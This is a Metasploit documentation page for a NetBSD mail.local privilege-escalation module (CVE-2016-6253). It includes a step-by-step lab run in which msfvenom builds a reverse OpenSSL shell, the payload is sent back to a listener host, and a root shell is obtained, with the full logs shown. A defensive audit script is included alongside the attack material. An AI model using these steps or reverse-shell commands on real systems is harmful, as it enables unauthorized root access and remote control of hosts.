NetBSD mail.local Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/unix/local/netbsd_mail_local metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: NetBSD mail.local Privilege Escalation
Module: exploit/unix/local/netbsd_mail_local
Source code: modules/exploits/unix/local/netbsd_mail_local.rb
Disclosure date: 2016-07-07
Last modification time: 2021-01-21 19:59:29 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2016-6253
This module attempts to exploit a race condition in mail.local with SUID bit set on:
- NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
- NetBSD 6.1 - 6.1.5
- NetBSD 6.0 - 6.0.6
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.
msf > use exploit/unix/local/netbsd_mail_local
msf exploit(netbsd_mail_local) > show targets
... a list of targets ...
msf exploit(netbsd_mail_local) > set TARGET target-id
msf exploit(netbsd_mail_local) > show options
... show and set options ...
msf exploit(netbsd_mail_local) > set SESSION session-id
msf exploit(netbsd_mail_local) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
NetBSD 7.0.1 is available from the official site, or on an unofficial git
Issues
Getting an initial shell that can write files correctly was difficult. The best I found was reverse_openssl.
Payloads that didn't work:
* cmd/unix/reverse - connected back, but couldn't write file.
[*] Started reverse TCP double handler on 172.16.152.1:4444
[*] Writing Payload to /tmp/zrWqhXpL
[*] Max line length is 131073
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] /usr/bin/printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] perl -e 'print("\0\377\376\101\102\103\104\177\45\45\15\12")' Failed: "perl: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: "gawk: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] echo '00fffe414243447f25250d0a'|xxd -p -r Failed: "xxd: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] echo -ne '\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a' Failed: "-ne \\x00\\xff\\xfe\\x41\\x42\\x43\\x44\\x7f\\x25\\x25\\x0d\\x0a\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[-] Exploit failed: RuntimeError Can't find command on the victim for writing binary data
[*] Exploit completed, but no session was created.
* cmd/unix/reverse_awk - awk: syntax error at source line 1
* cmd/unix/reverse_bash - ./bsd.payload: 1: Syntax error: Bad fd number
* cmd/unix/reverse_bash_telnet_ssl - $ telnet: unknown option -- z
* cmd/unix/reverse_ssl_double_telnet - $ telnet: unknown option -- z
* cmd/unix/reverse_lua - lua: (command line):1: module 'socket' not found
* netcat, node, perl, php, python, php, ruby, zsh - all not installed by default
* bsd/* didn't seem to work either, maybe it's for FreeBSD?
Payloads that did work:
* cmd/unix/reverse_openssl
Verification Steps
- Start msfconsole
- Get an initial shell
- Create working shell, scp it over
./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload
scp /tmp/bsd.payload [email protected]:/tmp/
- Setup msf to handle
use exploit/multi/handler
set payload cmd/unix/reverse_openssl
set lhost 172.16.152.1
exploit
- Run the shell from NetBSD
$ cd /tmp
$ ls
bsd.payload
$ chmod +x bsd.payload
$ ./bsd.payload
$ WARNING: can't open config file: /etc/openssl/openssl.cnf
depth=0 CN = vgekg
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = vgekg
verify return:1
- Receive the shell and background it
[*] Started reverse double SSL handler on 172.16.152.1:4444
[*] Starting the payload handler...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NwNHAEiJioYIvn4M;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "NwNHAEiJioYIvn4M\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400
^Z
Background session 1? [y/N] y
- Do:
use exploit/unix/local/netbsd_mail_local
- Do:
set payload cmd/unix/reverse_openssl
- Do:
set lhost 172.16.152.1
- Do:
set verbose true
- Do:
set session 1
- Do:
exploit
- You should get a root shell.
Options
ATRUNPATH
File location of atrun, defaults to /usr/libexec/atrun
MAILDIR
Location of mail folder, defaults to /var/mail
WritableDir
Location of a writable directory for our payload, defaults to /tmp
ListenerTimeout
Since this exploit relies on a cron job that runs on a 10min timer, the listener timeout needs to be 10min plus padding. Defaults to 603 seconds (10min, 3sec).
Scenarios
Here is a run against a virgin install of NetBSD 7.0.1 (from the unofficial link at the top):
NetBSD 7.0.1 (GENERIC.201605221355Z) amd64
In this example, I got lucky and only had to wait ~1min for the cron to hit, which runs every 10min by default.
- Get an initial shell
- Create working shell, scp it over
./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload
scp /tmp/bsd.payload [email protected]:/tmp/
- Setup msf to handle
use exploit/multi/handler
set payload cmd/unix/reverse_openssl
set lhost 172.16.152.1
exploit
- Run the shell from NetBSD
$ cd /tmp
$ ls
bsd.payload
$ chmod +x bsd.payload
$ ./bsd.payload
$ WARNING: can't open config file: /etc/openssl/openssl.cnf
depth=0 CN = vgekg
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = vgekg
verify return:1
- Receive the shell and background it
[*] Started reverse double SSL handler on 172.16.152.1:4444
[*] Starting the payload handler...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NwNHAEiJioYIvn4M;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "NwNHAEiJioYIvn4M\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400
^Z
Background session 1? [y/N] y
- Run the exploit
msf exploit(netbsd_mail_local) > set payload cmd/unix/reverse_openssl
payload => cmd/unix/reverse_openssl
msf exploit(netbsd_mail_local) > set lhost 172.16.152.1
lhost => 172.16.152.1
msf exploit(netbsd_mail_local) > set verbose true
verbose => true
msf exploit(netbsd_mail_local) > set session 1
session => 1
msf exploit(netbsd_mail_local) > exploit
[*] Started reverse double SSL handler on 172.16.152.1:4444
[*] Writing Payload to /tmp/pjDkvmGg
[*] Max line length is 131073
[*] Writing 176 bytes in 1 chunks of 618 bytes (octal-encoded), using printf
[*] Writing exploit to /tmp/GHIKGOWX.c
[*] Max line length is 131073
[*] Writing 4898 bytes in 1 chunks of 17162 bytes (octal-encoded), using printf
[*] Compiling /tmp/GHIKGOWX.c via gcc
[*] Starting the payload handler...
[*] Executing at 2016-08-25 19:59:04 -0400. May take up to 10min for callback
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo X6C4UIDx4zmwM0DJ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "X6C4UIDx4zmwM0DJ\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.152.1:4444 -> 172.16.152.128:65532) at 2016-08-25 20:00:02 -0400
[*] 2016-08-25 20:00:02 -0400
[*] Remember to run: chown root:wheel /usr/libexec/atrun
[+] Deleted /tmp/pjDkvmGg
[!] This exploit may require manual cleanup of '/tmp/pjDkvmGg' on the target
[!] This exploit may require manual cleanup of '/tmp/GHIKGOWX' on the target
[!] This exploit may require manual cleanup of '/tmp/GHIKGOWX.out' on the target
1633029467
TkBWZEPqsRvYvmwNaTcjImhcSzZHOAtY
true
JUqfyioWthnpvyxRJAZosSGQjnLHqPUB
sHXbQbHqFIbnZGoFWlZoppGprWyKwFCr
nDpSrEmQhDuVSxIpILWCOABbMOIAWUTx
whoami
root
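The run above ends with a reminder to restore root:wheel ownership on atrun, and the module description ties the bug to a setuid mail.local on specific NetBSD releases; both are conditions an administrator can check on a host. The POSIX sh audit script below is an added example, not the module's own code or part of its documentation; it assumes the module's default ATRUNPATH and that mail.local is installed at /usr/libexec/mail.local (an assumption, overridable through MAIL_LOCAL).

```shell
#!/bin/sh
# Added audit example (not part of the Metasploit module or its documentation):
# checks the two host conditions this module depends on. ATRUNPATH defaults to
# the module's default; the mail.local path is an assumption (override MAIL_LOCAL).
ATRUN="${ATRUNPATH:-/usr/libexec/atrun}"
MAIL_LOCAL="${MAIL_LOCAL:-/usr/libexec/mail.local}"
# owner_group FILE: print "owner:group" via ls -ld, whose column layout is the
# same on NetBSD and GNU userland (stat's format flags differ between them).
owner_group() {
    ls -ld "$1" 2>/dev/null | awk '{ print $3 ":" $4 }'
}

# owned_by_root FILE [GROUP]: succeed only if FILE exists, is owned by root,
# and (when GROUP is given) belongs to that group.
owned_by_root() {
    og=$(owner_group "$1")
    [ -n "$og" ] || return 1
    [ "${og%%:*}" = root ] || return 1
    [ -z "$2" ] || [ "${og#*:}" = "$2" ] || return 1
}

# is_setuid FILE: succeed when FILE exists and has the setuid bit (find -perm is POSIX).
is_setuid() {
    [ -e "$1" ] && [ -n "$(find "$1" -prune -perm -4000 2>/dev/null)" ]
}

# audit: report both conditions; returns 1 when atrun ownership is wrong, else 0.
audit() {
    rc=0
    if owned_by_root "$ATRUN" wheel; then
        echo "OK   $ATRUN is owned by root:wheel"
    else
        echo "WARN $ATRUN ownership is '$(owner_group "$ATRUN")', expected root:wheel;" \
             "restore with 'chown root:wheel $ATRUN' and inspect what cron will run"
        rc=1
    fi
    if [ ! -e "$MAIL_LOCAL" ]; then
        echo "WARN $MAIL_LOCAL not found; set MAIL_LOCAL to the installed path"
    elif is_setuid "$MAIL_LOCAL"; then
        echo "INFO $MAIL_LOCAL is setuid; on NetBSD 6.0-6.0.6, 6.1-6.1.5 or 7.0-7.0.1" \
             "apply NetBSD-SA2016-006 (CVE-2016-6253)"
    else
        echo "OK   $MAIL_LOCAL is not setuid"
    fi
    return $rc
}

# Run when executed as a script; AUDIT_NOW=0 lets another script source the functions.
if [ "${AUDIT_NOW:-1}" = 1 ]; then audit || AUDIT_STATUS=$?; fi
```

A non-zero AUDIT_STATUS after a run means atrun is no longer root:wheel, which is the state the module leaves behind until the chown above is applied.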
Msfconsole Usage
Here is how the unix/local/netbsd_mail_local exploit module looks in the msfconsole:
msf6 > use exploit/unix/local/netbsd_mail_local
msf6 exploit(unix/local/netbsd_mail_local) > show info
Name: NetBSD mail.local Privilege Escalation
Module: exploit/unix/local/netbsd_mail_local
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2016-07-07
Provided by:
h00die <[email protected]>
akat1
Available targets:
Id Name
-- ----
0 Automatic Target
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ATRUNPATH /usr/libexec/atrun yes Location of atrun binary
ListenerTimeout 603 yes Number of seconds to wait for the exploit
MAILDIR /var/mail yes Location of mailboxes
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files
Payload information:
Description:
This module attempts to exploit a race condition in mail.local with
SUID bit set on: NetBSD 7.0 - 7.0.1 (verified on 7.0.1) NetBSD 6.1 -
6.1.5 NetBSD 6.0 - 6.0.6 Successful exploitation relies on a crontab
job with root privilege, which may take up to 10min to execute.
References:
http://akat1.pl/?id=2
https://www.exploit-db.com/exploits/40141
https://nvd.nist.gov/vuln/detail/CVE-2016-6253
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc
Module Options
This is a complete list of options available in the unix/local/netbsd_mail_local exploit:
msf6 exploit(unix/local/netbsd_mail_local) > show options
Module options (exploit/unix/local/netbsd_mail_local):
Name Current Setting Required Description
---- --------------- -------- -----------
ATRUNPATH /usr/libexec/atrun yes Location of atrun binary
ListenerTimeout 603 yes Number of seconds to wait for the exploit
MAILDIR /var/mail yes Location of mailboxes
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files
Exploit target:
Id Name
-- ----
0 Automatic Target
Advanced Options
Here is a complete list of advanced options supported by the unix/local/netbsd_mail_local exploit:
msf6 exploit(unix/local/netbsd_mail_local) > show advanced
Module advanced options (exploit/unix/local/netbsd_mail_local):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 603 no Additional delay in seconds to wait for a session
Exploit Targets
Here is a list of targets (platforms and systems) which the unix/local/netbsd_mail_local module can exploit:
msf6 exploit(unix/local/netbsd_mail_local) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Target
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the unix/local/netbsd_mail_local exploit:
msf6 exploit(unix/local/netbsd_mail_local) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
1 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
Evasion Options
Here is the full list of possible evasion options supported by the unix/local/netbsd_mail_local exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(unix/local/netbsd_mail_local) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Related Pull Requests
- #14640 Merged Pull Request: rubocop -a modules/exploits/unix/local/
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7414 Merged Pull Request: netbsd mail.local bash removal
- #7335 Merged Pull Request: fix my email address
- #7245 Merged Pull Request: Add NetBSD Mail.local privesc module
References
- http://akat1.pl/?id=2
- EDB-40141
- CVE-2016-6253
- http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc
See Also
Check also the following modules related to this module:
- exploit/unix/local/at_persistence
- exploit/unix/local/chkrootkit
- exploit/unix/local/emacs_movemail
- exploit/unix/local/exim_perl_startup
- exploit/unix/local/opensmtpd_oob_read_lpe
- exploit/unix/local/setuid_nmap
- exploit/unix/smtp/morris_sendmail_debug
- exploit/unix/smtp/opensmtpd_mail_from_rce
- exploit/unix/smtp/qmail_bash_env_exec
- exploit/unix/webapp/hastymail_exec
- exploit/unix/webapp/squirrelmail_pgp_plugin
- exploit/unix/webapp/wp_phpmailer_host_header
- exploit/bsd/finger/morris_fingerd_bof
- payload/bsd/sparc/shell_bind_tcp
- payload/bsd/sparc/shell_reverse_tcp
- payload/bsd/vax/shell_reverse_tcp
- payload/bsd/x64/exec
- payload/bsd/x64/shell_bind_ipv6_tcp
- payload/bsd/x64/shell_bind_tcp
- payload/bsd/x64/shell_bind_tcp_small
- payload/bsd/x64/shell_reverse_ipv6_tcp
- payload/bsd/x64/shell_reverse_tcp
- payload/bsd/x64/shell_reverse_tcp_small
- payload/bsd/x86/exec
- payload/bsd/x86/metsvc_bind_tcp
- payload/bsd/x86/metsvc_reverse_tcp
- payload/bsd/x86/shell/bind_ipv6_tcp
- payload/bsd/x86/shell/bind_tcp
- payload/bsd/x86/shell_bind_tcp
- payload/bsd/x86/shell_bind_tcp_ipv6
- payload/bsd/x86/shell_find_port
- payload/bsd/x86/shell/find_tag
- payload/bsd/x86/shell_find_tag
- payload/bsd/x86/shell/reverse_ipv6_tcp
- payload/bsd/x86/shell/reverse_tcp
- payload/bsd/x86/shell_reverse_tcp
- payload/bsd/x86/shell_reverse_tcp_ipv6
- post/bsd/gather/hashdump
Authors
- h00die <[email protected]>
- akat1
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.